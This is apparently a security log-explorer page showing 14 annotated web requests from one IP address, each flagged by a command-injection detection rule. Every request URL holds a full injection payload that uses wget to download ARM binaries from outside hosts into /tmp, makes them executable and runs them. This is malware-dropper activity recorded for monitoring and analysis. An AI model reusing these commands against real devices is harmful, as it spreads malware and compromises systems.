Log Explorer
Fact drill-down for 185.196.10.129
Risk: 6 (LOW)
Scope: All time
All-time facts: 14
In-scope: 14
Filtered: 14
Seen: 2025-01-21 → 2025-02-05
Faceted filters (facts-based)
Annotation facets
Annotator: base — 7; cmdi — 7
Severity: (none) — 7; 28 — 7
Label: cmdi — 7; observed — 7
HTTP facets
Method: GET — 14
HTTP status: 301 — 14
Snapshot facets
Subnet: 185.196.10.0/24 — 14
ASN: 42624 — 14
Country: Switzerland — 14
Region: Bern — 14
City: Bern — 14
Top annotators (facts, in-scope): base 7; cmdi 7
Top labels (facts, in-scope): cmdi 7; observed 7
Annotated access events
Showing page 1 / 1 — total 14 rows
#
1
2025-02-05 16:38:17
event
2859307
GET
301
bytes
169
ann
base
label
observed
Request
event observed
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.19/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.19/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
observed
rule
base_observed
conf
—
details
—
More (full fields + snapshot)
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.19/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.19/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
event observed
details
—
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
#
2
2025-02-05 16:38:17
event
2859307
GET
301
bytes
169
ann
cmdi
28
label
cmdi
Request
Command/file-injection indicator: cmdi:op_plus_cmd
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.19/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.19/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.19/bins/hold.arm7;chmod 777 hold.arm7;'
More (full fields + snapshot)
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.19/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.19/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.19/bins/hold.arm7;chmod 777 hold.arm7;'
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
#
3
2025-01-23 00:07:42
event
2640818
GET
301
bytes
169
ann
base
label
observed
Request
event observed
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
observed
rule
base_observed
conf
—
details
—
More (full fields + snapshot)
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
event observed
details
—
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
#
4
2025-01-23 00:07:42
event
2640818
GET
301
bytes
169
ann
cmdi
28
label
cmdi
Request
Command/file-injection indicator: cmdi:op_plus_cmd
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.66/bins/hold.arm7;chmod 777 hold.arm7;'
More (full fields + snapshot)
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.66/bins/hold.arm7;chmod 777 hold.arm7;'
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
#
5
2025-01-22 23:32:01
event
2639795
GET
301
bytes
169
ann
base
label
observed
Request
event observed
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
observed
rule
base_observed
conf
—
details
—
More (full fields + snapshot)
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
event observed
details
—
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
#
6
2025-01-22 23:32:01
event
2639795
GET
301
bytes
169
ann
cmdi
28
label
cmdi
Request
Command/file-injection indicator: cmdi:op_plus_cmd
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.66/bins/hold.arm7;chmod 777 hold.arm7;'
More (full fields + snapshot)
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.66/bins/hold.arm7;chmod 777 hold.arm7;'
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
#
7
2025-01-22 11:57:15
event
2599779
GET
301
bytes
169
ann
base
label
observed
Request
event observed
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
observed
rule
base_observed
conf
—
details
—
More (full fields + snapshot)
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
event observed
details
—
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
#
8
2025-01-22 11:57:15
event
2599779
GET
301
bytes
169
ann
cmdi
28
label
cmdi
Request
Command/file-injection indicator: cmdi:op_plus_cmd
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.66/bins/hold.arm7;chmod 777 hold.arm7;'
More (full fields + snapshot)
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.66/bins/hold.arm7;chmod 777 hold.arm7;'
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
#
9
2025-01-22 10:17:31
event
2598820
GET
301
bytes
169
ann
base
label
observed
Request
event observed
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
observed
rule
base_observed
conf
—
details
—
More (full fields + snapshot)
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
event observed
details
—
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
#
10
2025-01-22 10:17:31
event
2598820
GET
301
bytes
169
ann
cmdi
28
label
cmdi
Request
Command/file-injection indicator: cmdi:op_plus_cmd
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.66/bins/hold.arm7;chmod 777 hold.arm7;'
More (full fields + snapshot)
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.66/bins/hold.arm7;chmod 777 hold.arm7;'
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
#
11
2025-01-21 21:25:35
event
2553087
GET
301
bytes
169
ann
base
label
observed
Request
event observed
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
observed
rule
base_observed
conf
—
details
—
More (full fields + snapshot)
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
event observed
details
—
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
#
12
2025-01-21 21:25:35
event
2553087
GET
301
bytes
169
ann
cmdi
28
label
cmdi
Request
Command/file-injection indicator: cmdi:op_plus_cmd
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.66/bins/hold.arm7;chmod 777 hold.arm7;'
More (full fields + snapshot)
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.66/bins/hold.arm7;chmod 777 hold.arm7;'
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
#
13
2025-01-21 20:50:16
event
2552680
GET
301
bytes
169
ann
base
label
observed
Request
event observed
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
observed
rule
base_observed
conf
—
details
—
More (full fields + snapshot)
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
event observed
details
—
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
#
14
2025-01-21 20:50:16
event
2552680
GET
301
bytes
169
ann
cmdi
28
label
cmdi
Request
Command/file-injection indicator: cmdi:op_plus_cmd
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.66/bins/hold.arm7;chmod 777 hold.arm7;'
More (full fields + snapshot)
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.66/bins/hold.arm7;chmod 777 hold.arm7;'
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation